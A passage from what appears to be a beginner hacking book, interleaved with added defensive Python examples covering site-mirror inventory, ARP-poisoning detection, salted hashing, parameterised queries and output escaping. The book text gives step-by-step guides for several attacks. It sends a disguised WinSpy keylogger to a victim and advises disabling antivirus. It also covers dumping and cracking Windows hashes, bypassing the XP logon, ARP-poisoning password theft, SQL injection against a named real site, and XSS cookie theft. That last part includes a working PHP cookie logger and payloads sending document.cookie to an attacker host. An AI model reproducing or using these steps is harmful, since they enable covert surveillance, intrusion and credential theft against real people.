The voice quality with Cain and other tools depends on the codec your VoIP devices use. With my equipment, I find the quality is marginal at best. That’s not really a big deal, though, because your goal is to prove there’s a vulnerability — not to listen in on other people’s conversations.

There’s also a Linux-based tool called vomit (http://vomit.xtdnet.nl) — short for voice over misconfigured Internet telephones — that you can use to convert VoIP conversations into .wav files. You first need to capture the actual conversation by using tcpdump, but if Linux is your preference, this solution offers basically the same results as Cain, outlined in the preceding steps.

If you’re going to work a lot with VoIP, I highly recommend you invest in a good VoIP network analyzer. Check out WildPackets’ OmniPeek — a great all-in-one wired and wireless analyzer (www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer) — and TamoSoft’s CommView (www.tamos.com/products/commview), which is a great low-priced alternative.

These VoIP vulnerabilities are only the tip of the iceberg. New systems, software, and related protocols continue to emerge, so it pays to remain vigilant, helping to ensure your conversations are “locked down” from those with malicious intent.

Web Application Tools:
✓ Acunetix Web Vulnerability Scanner (www.acunetix.com) for all-in-one security testing, including a port scanner, an HTTP sniffer, and an automated SQL injection tool
✓ Firefox Web Developer (http://chrispederick.com/work/web-developer) for manual analysis and manipulation of Web pages

Web hacking involves much more than just running automated scanning tools. They find around half of the issues, but you have to pick up where they leave off to truly assess the overall Web site and application. This isn’t a fault of Web vulnerability scanners but rather the nature of the beast. Poking and prodding Web sites and applications requires good old-fashioned hacker trickery and your favorite Web browser.

✓ HTTrack Website Copier (www.httrack.com) for mirroring a site for offline inspection. Mirroring is a method for crawling through (also called spidering) a Web site’s every nook and cranny and downloading publicly accessible pages to your local system.
✓ N-Stalker Web Application Security Scanner (www.nstalker.com/eng/products/nstealth) for all-in-one security testing, including password cracking and Web server load testing tools
✓ WebInspect (www.spidynamics.com/products/webinspect/index.html) for all-in-one security testing, including an excellent HTTP proxy and HTTP editor and an automated SQL injection tool

You can also use general vulnerability scanners, such as QualysGuard and LANguard, as well as exploit tools, such as Metasploit, when testing Web servers and applications. These tools can be used to find (and exploit) weaknesses at the Web server level that you might not otherwise find with standard Web scanning tools and manual analysis. Google can be beneficial for rooting through Web applications and looking for sensitive information. Although these non–application-specific tools can be beneficial, it’s important to know that they won’t drill down as deep as the tools given in the preceding list.

Crawlers
A spider program, such as the free HTTrack Website Copier, can crawl your site to look for every publicly accessible file. To use HTTrack, simply load it, give your project a name, tell HTTrack which Web site(s) to mirror, and after a few minutes (depending on the size and complexity of the site), you’ll have everything that’s publicly accessible on the site stored on your local drive in c:\My Web Sites. The figure shows the crawl output of a basic Web site.

Complicated sites often reveal more information that should not be there, including old data files and even application scripts and source code. During a recent Web security assessment project, I stumbled across a .zip file in a Web server’s download directory. When I tried to open the file, the system asked me for a password. Using my handy dandy Zip password cracking tool (see Chapter 7 for details on password cracking), I had the password in mere milliseconds. Inside the Zip file was an Excel spreadsheet containing sensitive patient healthcare information (names, addresses, Social Security numbers, and more) that anyone and everyone in the world could access. In situations like this, your business might be required to notify everyone involved that their information was unprotected and possibly compromised. It pays to know the laws and regulations affecting your business. Better yet, make sure users aren’t posting sensitive information in the first place!
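As an added example (not code from the book), here is a small Python script that goes through a site mirror such as the one HTTrack leaves under c:\My Web Sites and lists the files that have no business being publicly downloadable: archives, spreadsheets, backup copies and script source. For .zip files it also reports whether the archive is password-protected and what it contains, which is exactly the leftover described in the story above. The directory layout, file names and file contents it builds are constructed for the demonstration.

```python
"""Inventory a site mirror for files that should not be publicly reachable.

Added example, not code from the book. The sample mirror it builds is
constructed for the demonstration; point inventory() at a real HTTrack
output directory (e.g. c:\\My Web Sites\\<project>) to use it for real.
"""
import tempfile
import zipfile
from pathlib import Path

# File types that are normally part of a public site and need no attention.
ROUTINE = {".html", ".htm", ".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".ico", ".pdf"}
# Data and backup formats that usually mean something was left behind.
DATA = {".zip", ".rar", ".7z", ".xls", ".xlsx", ".csv", ".mdb", ".sql", ".bak", ".old", ".txt", ".log"}
# Script source served as a plain file instead of being executed.
SOURCE = {".php", ".asp", ".aspx", ".jsp", ".cfm", ".inc"}


def classify(path) -> str:
    """Bucket a file by its final extension; an inner extension marks old script copies."""
    path = Path(path)
    last = path.suffix.lower()
    inner = {s.lower() for s in path.suffixes[:-1]}
    if last in DATA and inner & SOURCE:
        return "source-backup"        # e.g. config.php.bak: readable copy of a script
    if last in DATA:
        return "data"
    if last in SOURCE:
        return "source"
    if last in ROUTINE:
        return "routine"              # index.php.html (a mirrored page) lands here too
    return "other"


def zip_summary(path: Path) -> dict:
    """Password-protected zips set general-purpose flag bit 0 on their members."""
    with zipfile.ZipFile(path) as zf:
        members = zf.infolist()
        return {
            "encrypted": any(info.flag_bits & 0x1 for info in members),
            "members": [info.filename for info in members],
        }


def inventory(root) -> list:
    """Walk the mirror and return every file that is not routine site content."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        kind = classify(path)
        if kind == "routine":
            continue
        item = {"path": path.relative_to(root).as_posix(), "kind": kind}
        if path.suffix.lower() == ".zip" and zipfile.is_zipfile(path):
            item.update(zip_summary(path))
        findings.append(item)
    return findings


def build_sample_mirror(root) -> Path:
    """Constructed mirror: two normal files plus the kind of leftovers the text describes."""
    root = Path(root)
    (root / "download").mkdir(parents=True, exist_ok=True)
    (root / "backup").mkdir(exist_ok=True)
    (root / "index.html").write_text("<html><body>Welcome</body></html>")
    (root / "brochure.pdf").write_bytes(b"%PDF-1.4 constructed placeholder")
    (root / "backup" / "config.php.bak").write_text("<?php $db_pass = 'placeholder'; ?>")
    with zipfile.ZipFile(root / "download" / "old_records.zip", "w") as zf:
        zf.writestr("patients.xls", b"constructed placeholder, not real data")
    return root


def demo() -> list:
    """Build the sample mirror in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = inventory(build_sample_mirror(tmp))
    for item in findings:
        print(item)
    return findings


if __name__ == "__main__":
    demo()
```

Run against a real mirror, the output is the short list you then open by hand; routine pages are skipped so that a backup copy of a script or a stray spreadsheet is not buried among hundreds of HTML files. An encrypted zip still shows up as a finding: the password only protects the contents, not the fact that the archive is exposed.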

Look at the output of your crawling program to see what files are available. Regular HTML and PDF files are probably okay because they’re most likely needed for normal Web usage. But it wouldn’t hurt to open each file to make sure it belongs there and doesn’t contain sensitive information you don’t want to share with the world.

Unsecured login mechanisms:-

You should also take your login testing to the next level by using a Web login cracking tool, such as Brutus (www.hoobie.net/brutus/index.html), as shown in Figure 14-12. Brutus is a very simple tool that can be used to crack both HTTP and form-based authentication mechanisms by using both dictionary and brute-force attacks.

Winspy keylogger:
WinSpy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. It includes Remote Install and Real-time Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. Below I will show you the exact method to install a winspy keylogger on a victim's computer remotely.

Step 1: First of all you need to download winspy keylogger.
Step 2: After downloading winspy keylogger run the application. On running, a dialog box will be prompted. Now, create a user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.
Step 3: Now, another box will come, explaining to you the hot keys (Ctrl + Shift + F12) to start the Winspy keylogger software.
Step 4: Now pressing the hot keys will take you to a login box asking you to enter the username and password. Enter the username and password and click ok.
Step 5: On entering the username and password you will be taken to the winspy main screen. Now select Remote at top and click on Remote install.
Step 6: On doing this you will be taken to the Remote install file creator. Enter the following things there:
User – Type in the victim's name.
File Name – Here you need to enter the name of the file that needs to be sent. Like I have kept the name “Funny joke” which the victim will love to accept.
File icon – You really don't need to change this.
Picture – Select the picture you want to insert into the remote file.
Email log to – In this field enter your email address which you will use to receive the keystrokes. Hotmail accounts do not accept remote files so use a Gmail account instead.
Step 7: After you have done all the above steps, click on “Create remote file”. Now the remote file will be created; it will look something like this.

Now you just have to send the victim your remote file via email attachment or by uploading it to a web-hosting site and then sending the victim the download link. Once the remote file gets installed on the victim's computer, you will receive keystrokes on a regular basis.

Note: Your antivirus may recognize winspy as a virus. So it's recommended that you disable your antivirus before installing winspy.

Which software keylogger is better, Sniperspy or Winspy?
I recommend Sniperspy for the following reasons:
1. Sniperspy is fully compatible with windows vista, but winspy has known compatibility issues with Windows vista.
2. It has a low antivirus detection rate.
3. Sniperspy can bypass firewalls but Winspy can't.

4. Sniperspy is recognized by CNN, BBC, CBS and other popular news networks, hence it is reputed and trustworthy.

Rainbow Tables
Rainbow tables is one of the best password cracking methods ever. Rainbow tables work with pre-calculated hashes of all passwords available within a certain character space, be that a-z or a-zA-Z or a-zA-Z0-9 etc. If the hashes are not salted a complex password could be cracked with rainbow tables. We will talk more about rainbow tables when we come to the Windows Password Hacking section.

Here are some more password cracking tools for learning purposes:
• Cain and Abel
• John the Ripper
• THC Hydra
• SolarWinds
• RainbowCrack

Cracking Windows Passwords:
As we know, the passwords are stored in windows in weak hash form. The first kind of which is called LM Manager Hash (Lan Manager). If the password is longer than 7 characters they are broken up in 7-character pieces made upper case, and then hashed with DES. This means there are only about 2^37 8-bit hashes instead of 2^83 16-bit hashes, hence making it easier for the hacker to crack it. The tool which is used to crack windows passwords is known as OPH Crack and it uses Rainbow tables to crack the password, which was explained in the Password Cracking section. Below are the steps which a hacker might take to crack windows passwords using OPH Crack. I will be using OPH 2.2; you can use a newer version which works in a similar manner.

1. First of all you would need hashes to crack windows passwords. Windows stores hashes
a) In the folder C:\windows\system32\config. This folder is locked to all accounts (including an Administrator account).
b) In a SAM file from C:\windows\repair if rdisk has ever run.
c) In the registry, under HKEY_LOCAL_MACHINE\SAM, which is locked to all accounts.
2. Now you would need a copy of those hashes to begin the cracking process. Here is a method to obtain windows hashes:
• Boot to linux and copy the file directly from C:\windows\system32\config.
• Run pwdump2, included in Ophcrack. Here is an example of the command line (start, run, type "cmd" and hit enter):
C:\Documents and Settings\Elliott Back>cd "C:\Program Files\ophcrack\win32_tools"
C:\Program Files\ophcrack\win32_tools>pwdump2
Administrator:499:aabbcc:3311dd:::
Elliott Back:234:aabbcc:3311dd:::
C:\Program Files\ophcrack\win32_tools>
3. Now once you have the hashes you can start the cracking process.

4. Start OPH CRACK 2.2.
Note: While installing OPH Crack make sure that you choose to download the table separately.
5. Now click on Load and then click on PwdDUMP file. Now select either the hashes you got from pwdump2 or from the SAM hash file.

6. Now you would need tables; you can get tables from the below url: http://ophcrack.sourceforge.net/tables.php
Note: If you have RAM less than 1GB you should look for a smaller table.
7. Now once you have the table, go to OPH Crack, click on Tables and type the rainbow hash table you are using, in this case it's 5k.
8. Now click on the Launch button and it will first load the tables into the memory and then begin trying passwords.
9. Once the process is completed it will show the cracked passwords, number of time per hash, hash-redux calculations and fseek operations. As you can see here, it has found 6/7 passwords; it could not find the password for one of the hashes but still our success rate is 86%.

Bypassing windows XP Logon Screen
This hack will allow you to bypass the windows xp or windows 2000 logon screen without knowing the actual password.

Requirements:
1. You must have Physical access to the victim's computer. I will explain this in the malware section.
2. You must have a CD drive or DVD drive.

To bypass the windows xp logon screen I will use a tool called DreampackPL. DreamPackPL is a software which allows you to login into a local account without resetting the actual password. DreampackPL disables the windows file protection mechanism, allowing you to bypass the password validation process. Below are the steps to use DreampackPL to bypass the windows xp password.

1. First of all download DreampackPL and the ISO File.
2. Burn the ISO file to CD with a software such as Ahead Nero.
3. Once the boot CD disc is created, restart the PC, and boot from the CD/DVD drive. User will come to the Windows 2000 (or Windows XP) Setup screen.
4. Now press R to continue and install Dream pack.
5. Select the Windows installation that is currently on the computer. Select 1 if you have one Windows. Make sure that you backup the sfcfiles.dll file by using the following command:
For Windows XP:
ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld
For Windows 2000:
ren C:\Winnt\System32\sfcfiles.dll sfcfiles.lld
6. Copy the patched file from CD to the System32 folder. Let's assume that your CD drive is E; then you will type the following command:
copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll
7. Now type "Exit", take out the disk and reboot.
8. Once Windows displays the Windows Logon prompt, key in the "dreamon" DreamPackPL command (without quotes) in the user name or password field.
9. Now the DreamPackPL menu will be displayed.
10. Click on the top graphic on the DreamPackPL and a popup menu will be displayed.
11. Navigate to Command and click on Command Setting options.
12. Now enable the God-password options by ticking the box.

13. Now exit from DreampackPL and enter god in the username or password option of the logon screen to successfully bypass the windows logon screen.

ARP Poisoning Attack
ARP stands for Address Resolution Protocol. It is used to map IP addresses to MAC addresses in a local area network segment where hosts of the same subnet reside. In an ARP poisoning attack the hacker places himself in between the router and server and steals all kinds of passwords. The following diagram will help you to understand the concept behind the ARP Poisoning attack.

Normally the data is exchanged between the user and router and the router will send the information to the server, which will allow you to login. In an ARP Poisoning attack the hacker will place himself between the server/Router and the user/Victim and therefore steal your private data. Below I will show you how a hacker can implement an ARP Poisoning attack and steal your passwords.
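Before the walkthrough, an added example from the defender's side (not code from the book). The mapping changes that Cain's APR feature forces, both in the VoIP capture section earlier and in the steps that follow, are visible to anyone watching ARP on the segment: an IP address that was announced by one MAC is suddenly announced by another, and the poisoning host ends up claiming to be both the gateway and the victim. The script replays a constructed list of ARP packets and raises an alert on each of those signals; the addresses are made up for the demonstration.

```python
"""Spot ARP cache poisoning in a stream of ARP packets.

Added example, not code from the book. The packets below are a constructed
sample; in practice you would feed it what a sniffer on the segment reports
(any tool that exposes the sender IP/MAC pair of each ARP packet will do).
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set


class ArpPacket(NamedTuple):
    time: str
    op: str          # "request" or "reply"; both carry a sender IP -> MAC claim
    sender_ip: str
    sender_mac: str


# Constructed capture: the gateway is .1, a workstation is .10, and a third host
# (de:ad:be:ef:00:99) starts answering for both of them, as an APR attacker does.
SAMPLE_CAPTURE = [
    ArpPacket("10:00:01", "request", "192.168.1.10", "aa:bb:cc:00:00:10"),
    ArpPacket("10:00:01", "reply",   "192.168.1.1",  "aa:bb:cc:00:00:01"),
    ArpPacket("10:00:05", "reply",   "192.168.1.1",  "de:ad:be:ef:00:99"),
    ArpPacket("10:00:05", "reply",   "192.168.1.10", "de:ad:be:ef:00:99"),
    ArpPacket("10:00:09", "reply",   "192.168.1.1",  "de:ad:be:ef:00:99"),
]

# Mappings that must never change; pinning the default gateway is the usual minimum.
PINNED = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def detect_arp_poisoning(packets, pinned: Optional[Dict[str, str]] = None) -> List[dict]:
    """Return one alert dict per suspicious event, in capture order.

    Signals:
      pinned-mismatch : a pinned IP is announced with a MAC other than the known one
      mapping-changed : an IP seen earlier with one MAC is now claimed by another
      multi-ip-mac    : one MAC claims more than one IP (the man in the middle
                        impersonates the gateway and the victim at the same time)
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    first_seen: Dict[str, str] = {}                  # ip -> MAC that first announced it
    claims: Dict[str, Set[str]] = defaultdict(set)   # MAC -> IPs it has announced
    alerts: List[dict] = []

    for p in packets:
        mac = p.sender_mac.lower()
        if p.sender_ip in pinned and pinned[p.sender_ip] != mac:
            alerts.append({"time": p.time, "kind": "pinned-mismatch",
                           "ip": p.sender_ip, "mac": mac})
        known = first_seen.setdefault(p.sender_ip, mac)
        if known != mac:
            # Keep the original mapping: every further spoofed announcement alerts again.
            alerts.append({"time": p.time, "kind": "mapping-changed",
                           "ip": p.sender_ip, "old": known, "new": mac})
        if p.sender_ip not in claims[mac]:
            claims[mac].add(p.sender_ip)
            if len(claims[mac]) > 1:
                alerts.append({"time": p.time, "kind": "multi-ip-mac",
                               "mac": mac, "ips": sorted(claims[mac])})
    return alerts


def summarize(alerts: List[dict]) -> Dict[str, int]:
    """Count alerts by kind."""
    counts: Dict[str, int] = defaultdict(int)
    for a in alerts:
        counts[a["kind"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_CAPTURE, PINNED):
        print(alert)
```

The "mapping-changed" rule on its own also fires when a host legitimately gets a new network card, which is why the pinned list and the "one MAC, several IPs" rule matter: a real gateway replacement is a planned event, whereas a single MAC that answers for the gateway and for a workstation within seconds is the shape of the attack described above.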

1. First of all open Cain and Abel.
2. Once you have opened Cain and Abel, go to "Configure" at the top, and select the Adapter that you use to connect to the internet (WiFi card).
3. Now click on the Sniffer tab and click on the nuclear yellow button just below the File button. (This will start Sniffing)
4. Now press the blue “+” sign.
5. A window will popup, make sure “All host in my subnet” is selected, and then he will click on OK button.
7. This will find all the active computers on your network.
8. Now go to the APR tab at the bottom.
9. Press the blue "+" sign again and select the IP of your router; all IPs connected to it will be prompted at the right side column, select the ones you want to intercept.
10. Then just press "OK", now press the yellow nuclear sign to start the ARP poisoning.
11. Now leave it for a few minutes. After some time go to the Password tab at the bottom to view the passwords you have collected. The passwords may appear in MD5 hash form, but most probably you will get them in simple form. Let's say that the password appears in MD5 hash form 0c4f5f8fd16ab0b20a152fab22c3c11c.

Cracking MD5 Hashes
Now we can use methods like Brute force, Dictionary attack or Rainbow tables to crack the hash and get the desired password. Cain and Abel does the job for you. All you have to do is simply enter the hash in the Cain and Abel Cracker and it will crack the password for you. Here is the method to use Cain and Abel to crack MD5 hashes.
1. First of all open Cain and Abel, select the Cracker button at the top and then select MD5 Hash and then click the “+” sign at the top. Enter the MD5 hash you want to crack and click OK.
2. Now right click the hash and then select the attack you want to use. I will use Brute-Force attack to crack the MD5 hash; you can also use Rainbow tables or Dictionary attack to crack.
3. Adjust Charset and password length.
4. Click Start and it will try passwords until it gets the right one.
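To tie the Rainbow Tables section earlier to the MD5 cracking steps just shown, here is an added Python example (not from the book). It builds the simplest form of a precomputed table, a hash-to-password dictionary over a constructed word list, looks up an unsalted MD5 hash the way the Cain cracker or an online lookup service would, and then shows that the same password stored with a per-user salt is not in the table, which is why the text notes that unsalted hashes are the ones rainbow tables break. The last pair of functions goes one step beyond the page by replacing plain MD5 with PBKDF2, the salted and deliberately slow construction that makes each guess expensive as well as table-proof. The word list, salt and hashes are constructed for the demonstration.

```python
"""Precomputed hash lookup versus salted storage.

Added example, not code from the book. WORDLIST, the salt and the sample
hashes are constructed for the demonstration.
"""
import hashlib
import os

# A tiny constructed word list; a real table covers a whole character space.
WORDLIST = ["password", "letmein", "summer2010", "iloveyou", "qwerty", "hunter2"]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_lookup_table(words) -> dict:
    """Hash every candidate once; afterwards a lookup costs one dictionary access.

    A rainbow table is this idea with hash->reduce chains so that only chain
    endpoints are stored, but the precondition is the same: the stored value
    must depend on the password alone.
    """
    return {md5_hex(w.encode()): w for w in words}


def lookup(table: dict, digest: str):
    """Return the password for an unsalted digest, or None if it is not in the table."""
    return table.get(digest.lower())


def store_salted(password: str, salt: bytes = None) -> tuple:
    """Store MD5(salt || password) together with the salt; the table no longer applies."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, md5_hex(salt + password.encode())


def verify_salted(stored: tuple, password: str) -> bool:
    salt, digest = stored
    return md5_hex(salt + password.encode()) == digest


def store_pbkdf2(password: str, salt: bytes = None, rounds: int = 200_000) -> tuple:
    """Salted and slow: each guess now costs `rounds` HMAC evaluations (beyond the page)."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def verify_pbkdf2(stored: tuple, password: str, rounds: int = 200_000) -> bool:
    salt, digest = stored
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex() == digest


def demo() -> dict:
    table = build_lookup_table(WORDLIST)
    unsalted = md5_hex(b"letmein")                            # what an unsalted store holds
    salt = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed salt
    salted = store_salted("letmein", salt)
    result = {
        "unsalted_hit": lookup(table, unsalted),              # found: "letmein"
        "salted_hit": lookup(table, salted[1]),               # None: the salt changes the digest
        "salted_verifies": verify_salted(salted, "letmein"),
        "pbkdf2_verifies": verify_pbkdf2(store_pbkdf2("letmein", salt), "letmein"),
    }
    for key, value in result.items():
        print(f"{key}: {value}")
    return result


if __name__ == "__main__":
    demo()
```

The salt does not have to be secret; it only has to differ per user, so that a table built once cannot be reused and every stored hash has to be attacked separately.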

Usually passwords below 6 or 7 letters get cracked in a very short span of time; if the password is longer than 7 characters then it can take very long to crack the password. If the password is longer than 7 letters then using rainbow tables is a better option.

Packet Sniffing
You might have heard not to give out your user-name/password or credit card number when you are on MSN, yahoo or IM Chat, because you would have probably heard that hackers have some ways to steal your credit card numbers, passwords etc. The method which most hackers use is called Packet Sniffing. Packet Sniffing is defined as the act of capturing packets through a network. The tool which most hackers use to sniff packets through a network is called Wireshark; there are also other tools like windump, Dsniff etc but I will demonstrate packet sniffing through wireshark.
1. Download and install wireshark and launch it.
2. Now click on the button below the File option. This will list available capture interfaces.
3. Next you need to choose a target; if you are not sure what your target is, wait for a few seconds: the one that accumulates the larger number of packets is the better choice.
4. Now it will capture the packets and you will be able to see targets' msn, yahoo or IM chat conversations.

SQL Injection
SQL Injection is the most commonly used method to hack a website. It takes advantage of improper coding of web applications. In an SQL Injection attack the hacker attempts to pass SQL commands through a web application; if the web application is not coded properly it may result in allowing the hacker to access the database to view the information.

Simplest SQL Injection
1. First of all the hacker would look for a site vulnerable to SQL Injection. The hacker will search for the admin page of the target site.
2. Once the hacker reaches the admin login page the hacker will test if the website is vulnerable to SQL Injection or not.
3. Now the hacker will try SQL commands manually; if the site is vulnerable to this attack the hacker will probably gain access to the database.

SQL Injection with SQL Helper
Since this book is for beginners and newbies I won't make it complicated. SQL Helper is a tool which is used to perform a SQL Injection attack; you do not need any kind of knowledge of SQL to use this software.

1. First of all download SQL Helper and launch it.
2. Now you need to find a target. You need to find a website with a potential vulnerability. You can use some vulnerability scanning software to scan for vulnerabilities or try the manual method which I have below.
3. Let's say that the target is http://encycl.anthropology.ru; by entering article.php?id='1 in the url it will give us a syntax error. If you get such error messages, this means the site is vulnerable to SQL Injection.
4. Now run SQLI helper and insert http://encycl.anthropology.ru/article.php?id='1 in the target field and click inject.
5. The SQLI helper will search for the desired columns.
6. Now click on the “Get Database” button; it will be located just below the inject button.
7. Select any one of the elements from the Database Name column. I choose anthropo_encycl and then click on Get Tables; the Get Tables option will be located beside the Get Database option.
8. Now select an element from the table, e.g. user, work, person_old etc. I choose user and click on Get Columns.
9. As you can see, “user” has columns “usr_login” and “usr_pas”; select both of them and click on “Dump Now”.
10. As you can see, the values achieved are in form of hash, hence we need to crack the hashes; either you can use the method I showed you in the ARP Poisoning attack or you can just try to crack the hashes through some websites like md5crack.com
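Seen from the developer's side, the id='1 probe used in step 3 above is a test of how the page builds its query. As an added example (not code from the book, and not the database of the site named above), the Python script below keeps a tiny constructed article table in SQLite and runs the probe against two versions of the lookup: one that pastes the id into the SQL text, which fails with the syntax error the text describes, and one that binds it as a parameter, which simply finds no row. It also applies the advice from the Website Hacking section later in the book, rejecting anything but digits before the database is touched, so one example covers both passages. The table name, column names and rows are constructed.

```python
"""The id='1 probe against a concatenated query and a parameterised one.

Added example, not code from the book. The article table and its rows are
constructed; they are not the contents of any real site.
"""
import re
import sqlite3

ID_PATTERN = re.compile(r"^[0-9]{1,9}$")   # an article id is a short run of digits


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO article VALUES (?, ?)",
                    [(1, "Kinship"), (2, "Totemism"), (3, "Ritual")])
    return con


def fetch_article_vulnerable(con, article_id: str) -> list:
    """Builds the statement from the raw URL parameter, the defect the text describes."""
    sql = "SELECT id, title FROM article WHERE id = " + article_id
    return con.execute(sql).fetchall()


def fetch_article_safe(con, article_id: str) -> list:
    """Binds the parameter: the driver passes it as a value, never as SQL text."""
    return con.execute("SELECT id, title FROM article WHERE id = ?", (article_id,)).fetchall()


def probe_raises_error(fetch, con, article_id: str) -> bool:
    """True if the probe makes the query fail, i.e. the error a tester looks for."""
    try:
        fetch(con, article_id)
        return False
    except sqlite3.Error:
        return True


def handle_request(con, article_id: str) -> dict:
    """Request handler with input validation in front of the parameterised query."""
    if not ID_PATTERN.match(article_id):
        return {"status": 400, "body": "invalid article id"}
    rows = fetch_article_safe(con, article_id)
    if not rows:
        return {"status": 404, "body": "no such article"}
    return {"status": 200, "body": rows[0][1]}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1     :", fetch_article_vulnerable(db, "1"))
    print("vulnerable, id='1    : error =", probe_raises_error(fetch_article_vulnerable, db, "'1"))
    print("parameterised, id='1 :", fetch_article_safe(db, "'1"))
    print("handler, id='1       :", handle_request(db, "'1"))
```

Note what each layer buys: the digit check returns a clean 400 and never reaches the database, and the bound parameter means that even input which passes a looser check can only ever be compared as a value, not parsed as SQL. The error message is worth hiding too, since it is precisely what the tool in step 4 relies on.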

Cross Site Scripting (XSS)
Cross site scripting has caused a lot of damage over the past years. Major sites like Twitter, yahoo, Facebook etc have also been victims of this attack. These vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious code (usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.

Types
XSS or cross site scripting can be classified into two types:
1. Persistent xss
2. Non persistent xss

Persistent xss
Persistent xss occurs when the data provided by the hacker or attacker is saved on the server. In persistent xss the hacker's malicious codes and scripts are rendered automatically. In this method the hacker does not even interact itself with web functionality to exploit such a hole.

Non Persistent xss
Non persistent xss is the most common type of xss. This occurs when the information provided by the web client is used by server side scripts to generate a page of results for the user.

Searching for the vulnerability
Like SQL injection you can use the manual method to test or use a vulnerability scanner. To test for an xss vulnerability you just need to enter <script>alert("test");</script> in a search form or webform. For example, a site www.lapdonline.org is the site the hacker would test for xss vulnerability. The hacker would go to its search bar and enter the html or javascript <script>alert("test");</script>. A popup box will appear like the one below:

This shows that the website has an xss vulnerability.

Stealing the cookies
The next step which the hacker will take is stealing the cookies and faking it to gain access. Now you must be wondering how the hacker or attacker gets the cookies? To get cookies the hacker must create an internet page with PHP and ASP. Below is the PHP script which the hacker will use to get the cookies.

<?php
$filename = "cookielog.txt";
if (isset($_GET["cookie"])) {
    if (!$handle = fopen($filename, 'a')) {
        echo "Error: Unable to write to the log file";
        exit;
    } else {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) {
            echo "Error while writing to log file";
            exit;
        }
    }
    echo "Successfully wrote a string to the log file";
    fclose($handle);
    exit;
}
echo "nothing to write to the log file";
exit;
?>

Now open a wordpad and paste the above script and save it as cookielogger.php. Now the hacker will upload it to a webhosting site; I suggest you use 110mb.com or ripway.com.

Now you need to test the cookie catcher to find out whether it's working or not. Just add http://www.xxxx.com/cookielogger.php?cookie=test, where xxxx is your webhosting site where you have uploaded the cookie file.

When you visit the link the string test will be written successfully to the cookielog.txt file; this shows that your Cookie stealer is working. Cookielogger.php is now ready to log text strings and also ready to log cookies. I used the Cross Site Scripting exploit to inject a code that will redirect the user to http://www.xxx.com/cookielogger.php with the argument "cookie" filled with the user's cookie. So when the user visits the original site with the added code he will be redirected to www.xxxx.com/cookielogger.php?cookie=hiscookie and his cookie information will be saved in the cookielog.txt file. Now here is the code which the hacker will insert in the vulnerable site.

<SCRIPT>location.href='http://www.xxxx.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>
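The payload above only works because the search page echoes the input back as live HTML and because the browser lets script read the session cookie through document.cookie. As an added example (not code from the book), here is the Python rendering of the two fixes: the search echo is HTML-encoded, so the probe <script>alert("test");</script> from the previous section comes back as inert text, and the session cookie is issued with the HttpOnly and Secure flags, so a script that does run cannot read it. The output encoding is the first item of the Cross Site Scripting prevention list later in the book; the cookie flags are a standard hardening the book does not mention. The page markup, cookie name and cookie value are constructed.

```python
"""Reflected search echo, unsafe and escaped, plus a hardened session cookie.

Added example, not code from the book. The markup, cookie name and value are
constructed for the demonstration.
"""
import html
from http import cookies

# The probe the text uses to find a reflection point.
XSS_PROBE = '<script>alert("test");</script>'


def render_search_unsafe(query: str) -> str:
    """Reflects the query verbatim: any markup in it becomes part of the page."""
    return f"<p>Results for: {query}</p>"


def render_search(query: str) -> str:
    """Encodes output: <, >, &, quotes become entities, so the browser shows text, not tags."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def contains_markup(fragment: str, needle: str = "<script") -> bool:
    """Did a tag survive into the rendered page? (case-insensitive check)"""
    return needle.lower() in fragment.lower()


def session_cookie_header(name: str, value: str, secure: bool = True) -> str:
    """Set-Cookie line for a session cookie that script cannot read (HttpOnly)
    and that the browser only sends over HTTPS (Secure)."""
    jar = cookies.SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = secure
    jar[name]["path"] = "/"
    return jar.output(header="Set-Cookie:").strip()


if __name__ == "__main__":
    print(render_search_unsafe(XSS_PROBE))
    print(render_search(XSS_PROBE))
    print(session_cookie_header("PHPSESSID", "c0ns7ruc7ed"))
```

With the escaped echo, the search page shows the literal text of the probe instead of running it, and with HttpOnly set, escape(document.cookie) in the injected script evaluates to a string that does not contain the session cookie at all, so the logger receives nothing worth replaying.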

Sending the user a file such as www.xxxx.com/cookielogger.php will make him suspicious and he will think twice before going to the site. So the hacker will create another PHP file, redirect.php or something like it. What this will do is redirect the victim to the exploited site and catch his/her cookies without making him suspicious.

<?php
header("Location: http://Vulnerablesite/?mkt=nlnl'); location.href='http://www.xxxx.com/cookielogger.php?cookie='+escape(document.cookie);escape('");
exit;
?>

